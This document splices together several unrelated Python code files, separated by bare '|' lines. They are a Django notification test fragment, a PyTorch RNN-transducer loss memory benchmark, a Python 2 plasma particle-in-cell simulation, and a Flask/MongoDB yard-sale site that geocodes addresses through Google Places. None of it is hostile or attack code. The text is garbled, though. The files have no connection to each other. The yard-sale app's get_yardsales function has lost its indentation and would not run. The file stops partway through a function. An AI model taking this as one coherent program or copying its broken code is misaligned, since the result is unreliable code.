        A single notification is sent, to the right student and course, when
        every criterion is met.
        """
        self.student_three.profile.sms_verified = True
        self.student_three.profile.phone_number = "+15555555555"
        self.student_three.save()
        question = Question.objects.get(asked_by=self.student_three)
        question.should_send_up_soon_notification = True
        question.save()
        sendUpNextNotificationTask.s(self.queue.id).apply()
        mock_send.assert_called()
        self.assertEqual(1, len(mock_send.mock_calls))
        self.assertEqual(self.student_three, mock_send.call_args[0][0])
        self.assertEqual(self.course, mock_send.call_args[0][1])
|
"""
Tests for the C implementation of the sequence transducer.
From outside the package directory, run
`python -m transducer.test.`
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import time
import torch
import torch.autograd as autograd
import torch.nn as nn
import os
import subprocess
from warprnnt_pytorch import RNNTLoss
from transducer_np import RNNTLoss as rnntloss
# Command-line configuration for the benchmark: batch (B), input time steps
# (T), prediction steps (U) and vocabulary size (V), plus implementation flags.
parser = argparse.ArgumentParser(description='MXNet RNN Transducer Test.')
parser.add_argument('B', type=int, default=1, help='batch size')
parser.add_argument('T', type=int, default=300, help='time step')
parser.add_argument('U', type=int, default=100, help='prediction step')
parser.add_argument('V', type=int, default=60, help='vocab size')
parser.add_argument('--np', default=False, action='store_true', help='use numpy loss')
parser.add_argument('--add', default=False, action='store_true', help='add_network')
args = parser.parse_args()
# Pick the reference NumPy loss or the warp-rnnt binding based on --np.
fn = rnntloss() if args.np else RNNTLoss()
def get_gpu_memory_map():
    """Query nvidia-smi and return {gpu_index: used_memory_in_MiB}."""
    output = subprocess.check_output(
        [
            'nvidia-smi', '--query-gpu=memory.used',
            '--format=csv,nounits,noheader'
        ], encoding='utf-8')
    # One line of output per GPU, in device-index order.
    return {
        index: int(used)
        for index, used in enumerate(output.strip().split('\n'))
    }
def wrap_and_call():
    """Run one forward/backward pass of the RNNT loss on random CUDA inputs,
    printing estimated vs. actual GPU memory usage and timings."""
    print('initial gpu memory usage: {}'.format(get_gpu_memory_map()))
    batch_size = args.B
    vocab_size = args.V
    input_len = args.T
    output_len = args.U
    trans_acts = torch.zeros(batch_size, input_len, vocab_size).uniform_().cuda()
    pred_acts = torch.zeros(batch_size, output_len + 1, vocab_size).uniform_().cuda()
    labels = torch.zeros(batch_size, output_len).uniform_(1, vocab_size-1).int().cuda()
    trans_acts = autograd.Variable(trans_acts, requires_grad=True)
    pred_acts = autograd.Variable(pred_acts, requires_grad=True)
    labels = autograd.Variable(labels)
    lengths = autograd.Variable(torch.IntTensor([input_len] * batch_size).cuda())
    label_lengths = autograd.Variable(torch.IntTensor([output_len - 1] * batch_size).cuda())
    # Estimated bytes for the activation tensors (float32 = 4 bytes each).
    gpu_memory = batch_size * (input_len + (output_len + 1)) * vocab_size * 4
    print('before compute gradient, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
    if args.add:
        start = time.time()
        costs = fn(trans_acts, pred_acts, labels, lengths, label_lengths)
        end = time.time()
        print('cpu loss time: {:.3f} s\n'.format(end-start))
        # grads to trans_acts, pred_acts
        gpu_memory += batch_size * (input_len + (output_len + 1)) * vocab_size * 4
    else:
        # joint: combine transcription and prediction activations, then softmax
        acts = trans_acts.unsqueeze(dim=2) + pred_acts.unsqueeze(dim=1)
        log_probs = nn.functional.log_softmax(acts, dim=3)
        start = time.time()
        costs = fn(log_probs, labels, lengths, label_lengths)
        end = time.time()
        print('add network cpu loss time: {:.3f} s\n'.format(end-start))
        # acts & log_probs & grad to log_probs
        gpu_memory += batch_size * input_len * (output_len + 1) * vocab_size * 4 * 3
    print('after compute gradient, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
    start = time.time()
    costs.backward()
    end = time.time()
    # grads to trans_acts, pred_acts
    gpu_memory += batch_size * (input_len + (output_len + 1)) * vocab_size * 4
    if not args.add:
        # grads to acts
        gpu_memory += batch_size * input_len * (output_len + 1) * vocab_size * 4
    # grad to log_probs is not retained
    # if not args.add:
    #     gpu_memory -= batch_size * input_len * (output_len + 1) * vocab_size * 4
    print('after backward, gpu memory assume: {:.3f}GB = {:.3f}MB, actual {}'.format(gpu_memory / (1<<30), gpu_memory / (1<<20), get_gpu_memory_map()))
    print('backward time: {:.3f} s'.format(end-start))
    print('GPU memory comsume: {:.3f}GB = {:.3f}MB'.format(gpu_memory / (1<<30), gpu_memory / (1<<20)))
    print()
    torch.cuda.empty_cache()
def time_test(blank=0):
    """Run wrap_and_call a fixed number of times and report the mean wall time."""
    begin = time.time()
    iterations = 1
    for _ in range(iterations):
        wrap_and_call()
    elapsed = time.time() - begin
    print("Time per iteration: {:.3f}(s)".format(elapsed / iterations))
if __name__ == "__main__":
    time_test()
|
<reponame>gcasabona/cuda<gh_stars>10-100
#-----------------------------------------------------------------------
# Skeleton 3D Darwin PIC code
# written by <NAME>, <NAME>, and <NAME>, UCLA
# NOTE(review): this script uses Python 2 syntax (print statements,
# xrange); it requires a Python 2 interpreter.
import math
import numpy
from fdpush3 import *
from dtimer import *
# numpy dtypes matching the Fortran kinds expected by the fdpush3 library
int_type = numpy.int32
double_type = numpy.float64
float_type = numpy.float32
complex_type = numpy.complex64
# indx/indy/indz = exponent which determines grid points in x/y/z
# direction: nx = 2**indx, ny = 2**indy, nz = 2**indz.
indx = 7; indy = 7; indz = 7
# npx/npy/npz = number of electrons distributed in x/y/z direction.
npx = 384; npy = 384; npz = 384
# ndim = number of velocity coordinates = 3
ndim = 3
# tend = time at end of simulation, in units of plasma frequency.
# dt = time interval between successive calculations.
# qme = charge on electron, in units of e.
tend = 10.0; dt = 0.1; qme = -1.0
# vtx/vty/vtz = thermal velocity of electrons in x/y/z direction
vtx = 1.0; vty = 1.0; vtz = 1.0
# vx0/vy0/vz0 = drift velocity of electrons in x/y/z direction
vx0 = 0.0; vy0 = 0.0; vz0 = 0.0
# ax/ay/az = smoothed particle size in x/y/z direction
# ci = reciprocal of velocity of light.
ax = .912871; ay = .912871; az = .912871; ci = 0.1
# idimp = number of particle coordinates = 6
# ipbc = particle boundary condition: 1 = periodic
# sortime = number of time steps between standard electron sorting
idimp = 6; ipbc = 1; sortime = 20
# omx/omy/omz = magnetic field electron cyclotron frequency in x/y/z
omx = 0.4; omy = 0.0; omz = 0.0
# ndc = number of corrections in darwin iteration
ndc = 1
# wke/we = particle kinetic/electrostatic field energy
# wf/wm/wt = magnetic field/transverse electric field/total energy
# (one-element arrays so the compiled routines can write them in place)
wke = numpy.zeros((1),float_type)
we = numpy.zeros((1),float_type)
wf = numpy.zeros((1),float_type)
wm = numpy.zeros((1),float_type)
wt = numpy.zeros((1),float_type)
zero = 0.0
# declare scalars for standard code
wpmax = numpy.empty((1),float_type)
wpmin = numpy.empty((1),float_type)
# declare and initialize timing data
itime = numpy.empty((4),numpy.int32)
tdpost = 0.0; tguard = 0.0; tfft = 0.0; tfield = 0.0
tdjpost = 0.0; tdcjpost = 0.0; tpush = 0.0; tsort = 0.0
dtime = numpy.empty((1),double_type)
# initialize scalars for standard code
# np = total number of particles in simulation
# nx/ny/nz = number of grid points in x/y/z direction
np = npx*npy*npz; nx = int(math.pow(2,indx))
ny = int(math.pow(2,indy)); nz = int(math.pow(2,indz))
nxh = int(nx/2); nyh = max(1,int(ny/2)); nzh = max(1,int(nz/2))
nxe = nx + 2; nye = ny + 1; nze = nz + 1; nxeh = int(nxe/2)
nxyzh = int(max(nx,ny,nz)/2); nxhyz = max(nxh,ny,nz)
ny1 = ny + 1; nyz1 = ny1*(nz + 1)
# nloop = number of time steps in simulation
# ntime = current time step
nloop = int(tend/dt + .0001); ntime = 0
# mdim = dimension of amu array
mdim = 2*ndim
qbme = qme
affp = float(nx)*float(ny)*float(nz)/float(np)
# allocate data for standard code
# part, part2 = particle arrays
part = numpy.empty((idimp,np),float_type,'F')
if (sortime > 0):
   part2 = numpy.empty((idimp,np),float_type,'F')
# qe = electron charge density with guard cells
qe = numpy.empty((nxe,nye,nze),float_type,'F')
# cue = electron current density with guard cells
cue = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# dcu = acceleration density with guard cells
dcu = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# cus = smoothed transverse electric field with guard cells
cus = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# amu = momentum flux with guard cells
amu = numpy.empty((mdim,nxe,nye,nze),float_type,'F')
# exyze = smoothed total electric field with guard cells
exyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# fxyze = smoothed longitudinal electric field with guard cells
fxyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# bxyze = smoothed magnetic field with guard cells
bxyze = numpy.empty((ndim,nxe,nye,nze),float_type,'F')
# ffc, ffe = form factor arrays for poisson solvers
ffc = numpy.empty((nxh,nyh,nzh),complex_type,'F')
ffe = numpy.empty((nxh,nyh,nzh),complex_type,'F')
# mixup = bit reverse table for FFT
mixup = numpy.empty((nxhyz),int_type,'F')
# sct = sine/cosine table for FFT
sct = numpy.empty((nxyzh),complex_type,'F')
# npic = scratch array for reordering particles
npic = numpy.empty((nyz1),int_type,'F')
# ss = scratch array for WFFT3RN
ss = numpy.empty((mdim,nxeh),complex_type,'F')
# prepare fft tables
wfft3rinit(mixup,sct,indx,indy,indz,nxhyz,nxyzh)
# calculate form factor: ffc
isign = 0
pois33(qe,fxyze,isign,ffc,ax,ay,az,affp,we,nx,ny,nz,nxeh,nye,nze,nxh,
       nyh,nzh)
# initialize electrons
distr3(part,vtx,vty,vtz,vx0,vy0,vz0,npx,npy,npz,idimp,np,nx,ny,nz,ipbc)
# find maximum and minimum initial electron density
qe.fill(0.0)
gpost3l(part,qe,qme,np,idimp,nxe,nye,nze)
aguard3l(qe,nx,ny,nz,nxe,nye,nze)
fwpminmx3(qe,qbme,wpmax,wpmin,nx,ny,nz,nxe,nye,nze)
wpm = 0.5*(wpmax[0] + wpmin[0])*affp
# accelerate convergence: update wpm
if (wpm <= 10.0):
   wpm = 0.75*wpm
print "wpm=",wpm
q2m0 = wpm/affp
# calculate form factor: ffe
isign = 0
epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,nye,nze,
        nxh,nyh,nzh)
# initialize transverse electric field
cus.fill(0.0)
# * * * start main iteration loop * * *
# each pass through this loop advances the plasma by one time step dt
for ntime in xrange(0,nloop):
# print "ntime = ", ntime
# deposit current with standard procedure: updates cue
   dtimer(dtime,itime,-1)
   cue.fill(0.0)
   gjpost3l(part,cue,qme,zero,np,idimp,nx,ny,nz,nxe,nye,nze,ipbc)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tdjpost = tdjpost + time
# deposit charge with standard procedure: updates qe
   dtimer(dtime,itime,-1)
   qe.fill(0.0)
   gpost3l(part,qe,qme,np,idimp,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tdpost = tdpost + time
# add guard cells with standard procedure: updates qe, cue
   dtimer(dtime,itime,-1)
   aguard3l(qe,nx,ny,nz,nxe,nye,nze)
   acguard3l(cue,nx,ny,nz,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tguard = tguard + time
# transform charge to fourier space with standard procedure: updates qe
   dtimer(dtime,itime,-1)
   isign = -1
   wfft3rx(qe,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# calculate longitudinal force/charge in fourier space with standard
# procedure: updates fxyze, we
   dtimer(dtime,itime,-1)
   isign = -1
   pois33(qe,fxyze,isign,ffc,ax,ay,az,affp,we,nx,ny,nz,nxeh,nye,nze,nxh,
          nyh,nzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# transform longitudinal electric force to real space with standard
# procedure: updates fxyze
   dtimer(dtime,itime,-1)
   isign = 1
   wfft3r3(fxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
           nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# transform current to fourier space with standard procedure: update cue
   dtimer(dtime,itime,-1)
   isign = -1
   wfft3r3(cue,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# take transverse part of current with standard procedure: updates cue
   dtimer(dtime,itime,-1)
   cuperp3(cue,nx,ny,nz,nxeh,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# calculate magnetic field in fourier space with standard procedure:
# updates bxyze, wm
   dtimer(dtime,itime,-1)
   bbpois33(cue,bxyze,ffc,ci,wm,nx,ny,nz,nxeh,nye,nze,nxh,nyh,nzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# transform magnetic force to real space with standard procedure:
# updates bxyze
   dtimer(dtime,itime,-1)
   isign = 1
   wfft3r3(bxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
           nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# add constant to magnetic field with standard procedure: updates bxyze
   dtimer(dtime,itime,-1)
   baddext3(bxyze,omx,omy,omz,nx,ny,nz,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# copy guard cells with standard procedure: updates fxyze, bxyze
   dtimer(dtime,itime,-1)
   cguard3l(fxyze,nx,ny,nz,nxe,nye,nze)
   cguard3l(bxyze,nx,ny,nz,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tguard = tguard + time
# add longitudinal and old transverse electric fields with standard
# procedure: updates exyze
   dtimer(dtime,itime,-1)
   addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# deposit electron acceleration density and momentum flux with standard
# procedure: updates dcu, amu
   dtimer(dtime,itime,-1)
   dcu.fill(0.0); amu.fill(0.0)
   gdjpost3l(part,exyze,bxyze,dcu,amu,qme,qbme,dt,idimp,np,nxe,nye,nze)
# add old scaled electric field with standard procedure: updates dcu
   ascfguard3l(dcu,cus,q2m0,nx,ny,nz,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tdcjpost = tdcjpost + time
# add guard cells with standard procedure: updates dcu, amu
   dtimer(dtime,itime,-1)
   acguard3l(dcu,nx,ny,nz,nxe,nye,nze)
   amcguard3l(amu,nx,ny,nz,nxe,nye,nze,mdim)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tguard = tguard + time
# transform acceleration density and momentum flux to fourier space
# with standard procedure: updates dcu, amu
   dtimer(dtime,itime,-1)
   isign = -1
   wfft3r3(dcu,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
   wfft3rn(amu,ss,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,mdim,
           nxhyz,nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# take transverse part of time derivative of current with standard
# procedure: updates dcu
   dtimer(dtime,itime,-1)
   adcuperp3(dcu,amu,nx,ny,nz,nxeh,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# calculate transverse electric field with standard procedure:
# updates cus, wf
   dtimer(dtime,itime,-1)
   isign = -1
   epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,nye,
           nze,nxh,nyh,nzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# transform transverse electric field to real space with standard
# procedure: updates cus
   dtimer(dtime,itime,-1)
   isign = 1
   wfft3r3(cus,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,nxyzh)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfft = tfft + time
# copy guard cells with standard procedure: updates cus
   dtimer(dtime,itime,-1)
   cguard3l(cus,nx,ny,nz,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tguard = tguard + time
# add longitudinal and transverse electric fields with standard
# procedure: exyze = cus + fxyze, updates exyze
# cus needs to be retained for next time step
   dtimer(dtime,itime,-1)
   addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tfield = tfield + time
# inner iteration loop (darwin correction, repeated ndc times)
   for k in xrange(0,ndc):
# deposit electron current and acceleration density and momentum flux
# with standard procedure: updates cue, dcu, amu
      dtimer(dtime,itime,-1)
      cue.fill(0.0); dcu.fill(0.0); amu.fill(0.0)
      gdcjpost3l(part,exyze,bxyze,cue,dcu,amu,qme,qbme,dt,idimp,np,nxe,
                 nye,nze)
# add scaled electric field with standard procedure: updates dcu
      ascfguard3l(dcu,cus,q2m0,nx,ny,nz,nxe,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tdcjpost = tdcjpost + time
# add guard cells for current, acceleration density, and momentum flux
# with standard procedure: updates cue, dcu, amu
      dtimer(dtime,itime,-1)
      acguard3l(cue,nx,ny,nz,nxe,nye,nze)
      acguard3l(dcu,nx,ny,nz,nxe,nye,nze)
      amcguard3l(amu,nx,ny,nz,nxe,nye,nze,mdim)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tguard = tguard + time
# transform current to fourier space with standard procedure: update cue
      dtimer(dtime,itime,-1)
      isign = -1
      wfft3r3(cue,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
              nxyzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfft = tfft + time
# take transverse part of current with standard procedure: updates cue
      dtimer(dtime,itime,-1)
      cuperp3(cue,nx,ny,nz,nxeh,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
# calculate magnetic field in fourier space with standard procedure:
# updates bxyze, wm
      dtimer(dtime,itime,-1)
      bbpois33(cue,bxyze,ffc,ci,wm,nx,ny,nz,nxeh,nye,nze,nxh,nyh,nzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
# transform magnetic force to real space with standard procedure:
# updates bxyze
      dtimer(dtime,itime,-1)
      isign = 1
      wfft3r3(bxyze,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
              nxyzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfft = tfft + time
# add constant to magnetic field with standard procedure: updates bxyze
      dtimer(dtime,itime,-1)
      baddext3(bxyze,omx,omy,omz,nx,ny,nz,nxe,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
# transform acceleration density and momentum flux to fourier space
# with standard procedure: updates dcu, amu
      dtimer(dtime,itime,-1)
      isign = -1
      wfft3r3(dcu,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
              nxyzh)
      wfft3rn(amu,ss,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,mdim,
              nxhyz,nxyzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfft = tfft + time
# take transverse part of time derivative of current with standard
# procedure: updates dcu
      dtimer(dtime,itime,-1)
      adcuperp3(dcu,amu,nx,ny,nz,nxeh,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
# calculate transverse electric field with standard procedure:
# updates cus, wf
      dtimer(dtime,itime,-1)
      isign = -1
      epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,
              nye,nze,nxh,nyh,nzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
# transform transverse electric field to real space with standard
# procedure: updates cus
      dtimer(dtime,itime,-1)
      isign = 1
      wfft3r3(cus,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
              nxyzh)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfft = tfft + time
# copy guard cells with standard procedure: updates bxyze, cus
      dtimer(dtime,itime,-1)
      cguard3l(bxyze,nx,ny,nz,nxe,nye,nze)
      cguard3l(cus,nx,ny,nz,nxe,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tguard = tguard + time
# add longitudinal and transverse electric fields with standard
# procedure: exyze = cus + fxyze, updates exyze
# cus needs to be retained for next time step
      dtimer(dtime,itime,-1)
      addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
      dtimer(dtime,itime,1)
      time = float(dtime)
      tfield = tfield + time
      pass
# push particles with standard procedure: updates part, wke
   wke[0] = 0.0
   dtimer(dtime,itime,-1)
   gbpush3l(part,exyze,bxyze,qbme,dt,dt,wke,idimp,np,nx,ny,nz,nxe,nye,
            nze,ipbc)
   dtimer(dtime,itime,1)
   time = float(dtime)
   tpush = tpush + time
# sort particles by cell for standard procedure
   if (sortime > 0):
      if (ntime%sortime==0):
         dtimer(dtime,itime,-1)
         dsortp3yzl(part,part2,npic,idimp,np,ny1,nyz1)
# exchange pointers
         tpart = part
         part = part2
         part2 = tpart
         dtimer(dtime,itime,1)
         time = float(dtime)
         tsort = tsort + time
      pass
   pass
   if (ntime==0):
      wt = we + wm
      print "Initial Total Field, Kinetic and Total Energies:"
      print "%14.7e %14.7e %14.7e" % (wt, wke, wke + wt)
      print "Initial Electrostatic, Transverse Electric and Magnetic " \
            "Field Energies:"
      print "%14.7e %14.7e %14.7e" % (we, wf, wm)
   ntime = ntime + 1
# * * * end main iteration loop * * *
print "ntime, ndc = ", ntime, ndc
wt = we + wm
print "Final Total Field, Kinetic and Total Energies:"
print "%14.7e %14.7e %14.7e" % (wt, wke, wke + wt)
print "Final Electrostatic, Transverse Electric and Magnetic Field " \
      "Energies:"
print "%14.7e %14.7e %14.7e" % (we, wf, wm)
print ""
# timing summary: accumulated wall-clock time for each phase
print "deposit time = ", tdpost
print "current deposit time = ", tdjpost
print "current derivative deposit time = ", tdcjpost
tdpost = tdpost + tdjpost + tdcjpost
print "total deposit time = ", tdpost
print "guard time = ", tguard
print "solver time = ", tfield
print "fft time = ", tfft
print "push time = ", tpush
print "sort time = ", tsort
tfield = tfield + tguard + tfft
print "total solver time = ", tfield
time = tdpost + tpush + tsort
print "total particle time = ", time
wt = time + tfield
print "total time = ", wt
print ""
# normalized per-particle, per-step costs in nanoseconds
wt = 1.0e+09/(float(nloop)*float(np))
print "Push Time (nsec) = ", tpush*wt
print "Deposit Time (nsec) = ", tdpost*wt
print "Sort Time (nsec) = ", tsort*wt
print "Total Particle Time (nsec) = ", time*wt
|
import os
import requests
import time
from os import path
from flask import Flask, render_template, redirect, request, url_for
from flask_pymongo import PyMongo
from flask_googlemaps import GoogleMaps
from bson.objectid import ObjectId
from datetime import date
# instantiate the Flask application
app = Flask(__name__)
# Initialize the Google Maps extension
GoogleMaps(app)
# import env.py (local development only; it sets the env vars below)
if path.exists('env.py'):
    import env
# retrieve environment variables
app.config['MONGO_DBNAME'] = os.environ.get('MONGO_DBNAME')
app.config['MONGO_URI'] = os.environ.get('MONGO_URI')
app.config['GOOGLEMAPS_API_KEY'] = os.environ.get('GOOGLEMAPS_API_KEY')
# Google Places API endpoints used for geocoding addresses
googlemap_search_url = \
    ("https://maps.googleapis.com/maps/api/place/textsearch/json")
googlemap_details_url = \
    ("https://maps.googleapis.com/maps/api/place/details/json")
google_key = app.config['GOOGLEMAPS_API_KEY']
# instantiate the PyMongo client
mongo = PyMongo(app)
@app.route("/")
@app.route('/get_yardsales/', methods=["GET", "POST"])
def get_yardsales():
categories = mongo.db.categories.find()
# declare dictionary
searchcriteriadict = {}
if request.method == "POST":
# if form's returned value is not empty then add to dictionary /
yardsale_cat = request.form.get('categorysearch').capitalize()
if yardsale_cat != "":
if yardsale_cat == "All":
searchcriteriadict['category'] = \
{'$in': ['Estate', 'Garage', 'Community']}
else:
searchcriteriadict['category'] = yardsale_cat.capitalize()
else:
searchcriteriadict['category'] = \
{'$in': ['Estate', 'Garage', 'Community']}
yardsale_date = request.form.get('datesearch')
if yardsale_date != "":
searchcriteriadict['date'] = yardsale_date
# value in form "cityorzip" is either \
# the zip code or city
yardsale_cityorzip = request.form.get('cityorzipsearch')
if yardsale_cityorzip != "":
"""
check if there is matching document where form's value is equal\
to city. If found, then add to dictionary.\
Else, perform same search and action but for zip code
"""
if mongo.db.yard_sales.count_documents({'city':
yardsale_cityorzip}) > 0:
searchcriteriadict['city'] = yardsale_cityorzip
else:
if mongo.db.yard_sales.count_documents({'zip':
yardsale_cityorzip}) >\
0:
searchcriteriadict['zip'] = yardsale_cityorzip
yardsale_items = request.form.get('itemsearch').capitalize()
if yardsale_items != "":
searchcriteriadict['item_list'] = {'$in': [yardsale_items]}
if searchcriteriadict != {}:
search_results = mongo.db.yard_sales.find(searchcriteriadict)
yardsales_count = \
mongo.db.yard_sales.count_documents(searchcriteriadict)
return render_template('getyardsales.html',
yardsales=search_results,
categories=categories,
google_key=google_key,
yardsales_count=yardsales_count,
mode="search")
else:
return render_template('getyardsales.html',
yardsales_count=0, mode="search")
else:
today_date = date.today()
today_str = today_date.strftime("%Y-%m-%d")
yardsales = mongo.db.yard_sales.find({'date': today_str})
yardsales_count = yardsales.count()
return render_template('getyardsales.html',
yardsales=yardsales,
categories=categories,
google_key=google_key,
yardsales_count=yardsales_count, mode="all")
# route for the Add Yard Sales page (addyardsales.html)
@app.route('/add_yardsales', methods=["GET", "POST"])
def add_yardsales():
    """Render the Add Yard Sale form, forwarding any record status flag."""
    status = request.args.get('record_status')
    country_docs = mongo.db.countries.find()
    return render_template('addyardsales.html',
                           countries=country_docs, record_status=status)
# request addyardsales.html's form and insert it to the 'yard_sales' collection
@app.route('/insert_yardsale', methods=["GET", "POST"])
def insert_yardsale():
    """Create a new yard sale document from the submitted form data.

    Geocodes the entered address through the Google Places API and stores
    the resulting latitude/longitude alongside the form fields.
    """
    yardsales = mongo.db.yard_sales
    # retrieve address from form in addyardsales.html ('' defaults keep
    # missing fields from raising on string operations)
    address_1 = request.form.get('address1', '')
    address_2 = request.form.get('address2', '')
    city = request.form.get('city', '')
    state = request.form.get('state', '')
    zip_code = request.form.get('zip', '')  # renamed: don't shadow builtin zip
    # Join the non-empty address parts with spaces; the previous plain
    # concatenation ran address_1 and address_2 together with no
    # separator, producing addresses the geocoder could mis-resolve.
    full_addr = " ".join(
        part for part in (address_1, address_2, city, state, zip_code) if part)
    # pass in the address (to get_google_coord)
    # for which google coordinates are fetched from API's JSON
    google_coor = get_google_coord(full_addr)
    addr_lat = google_coor[0]
    addr_long = google_coor[1]
    # Normalise item names so item searches are case-insensitive.
    item_list = [i.capitalize() for i in request.form.getlist('itemlist')]
    yardsales.insert_one({
        'seller_first_name': request.form.get('first_name'),
        'seller_last_name': request.form.get('last_name'),
        'seller_email': request.form.get('email'),
        'item_list': item_list,
        'date': request.form.get('saledate'),
        'time': request.form.get('saletime'),
        'category': request.form.get('salecat', '').capitalize(),
        'address_1': request.form.get('address1'),
        'city': request.form.get('city'),
        'state': request.form.get('state'),
        'country_code': request.form.get('countrycode'),
        'zip': request.form.get('zip'),
        'lat': addr_lat,
        'long': addr_long
    })
    return redirect(url_for('add_yardsales', record_status="added"))
# getting coordinates
def get_google_coord(full_addr):
    """Geocode *full_addr* via the Google Places text-search API.

    :param full_addr: free-form address string to look up.
    :return: ``[latitude, longitude]`` of the first match.
    :raises IndexError: if the API returns no results for the address.
    """
    search_payload = {"key": google_key, "query": full_addr}
    # Explicit params= keyword (equivalent to the positional form, clearer).
    search_req = requests.get(googlemap_search_url, params=search_payload)
    search_json = search_req.json()
    # Brief pause to stay under the Places API rate limit.
    time.sleep(.3)
    location = search_json["results"][0]["geometry"]["location"]
    # Debug print of the coordinates removed.
    return [location["lat"], location["lng"]]
# route to page updatedeleteyardsales.html
@app.route('/updatedelete_yardsales',
           methods=["GET", "POST"])
def updatedelete_yardsales():
    """Search for yard sales to update or delete, by date and/or seller."""
    if request.method != "POST":
        return render_template('updatedeleteyardsales.html')
    # Map each optional form field onto its Mongo document key, keeping
    # only the fields the user actually filled in.
    criteria = {}
    for field, key in (('datesearch', 'date'),
                       ('fnamesearch', 'seller_first_name'),
                       ('lnamesearch', 'seller_last_name')):
        value = request.form.get(field)
        if value != "":
            criteria[key] = value
    results = mongo.db.yard_sales.find(criteria)
    match_count = mongo.db.yard_sales.count_documents(criteria)
    return render_template('updatedeleteyardsales.html',
                           yardsales=results, google_key=google_key,
                           yardsales_count=match_count)
# route to fetch countries plus one yard sale (by record id) and
# render the update form (updateyardsale.html)
@app.route('/update_yardsale/<yardsale_id>/<record_status>')
def update_yardsale(yardsale_id, record_status):
    """Show the edit form pre-filled with the selected yard sale."""
    country_docs = mongo.db.countries.find()
    # fetch the yard sale document by its ObjectId
    sale = mongo.db.yard_sales.find_one({'_id': ObjectId(yardsale_id)})
    return render_template('updateyardsale.html', countries=country_docs,
                           yardsale_upd=sale, google_key=google_key,
                           record_status=record_status)
# route to save changes to yard_sales collection
@app.route('/save_yardsale/<yardsale_id>/<record_status>',
           methods=["GET", "POST"])
def save_yardsale(yardsale_id, record_status):
    """Overwrite an existing yard sale document with the edited form data."""
    yardsales = mongo.db.yard_sales
    # retrieve address from form in updateyardsale.html ('' defaults keep
    # missing fields from raising on string operations)
    address_1 = request.form.get('address1', '')
    address_2 = request.form.get('address2', '')
    city = request.form.get('city', '')
    state = request.form.get('state', '')
    zip_code = request.form.get('zip', '')  # renamed: don't shadow builtin zip
    # Join the non-empty address parts with spaces; the previous plain
    # concatenation ran address_1 and address_2 together with no separator.
    full_addr = " ".join(
        part for part in (address_1, address_2, city, state, zip_code) if part)
    # pass in the address (to get_google_coord)
    # for which google coordinates are fetched from API's JSON
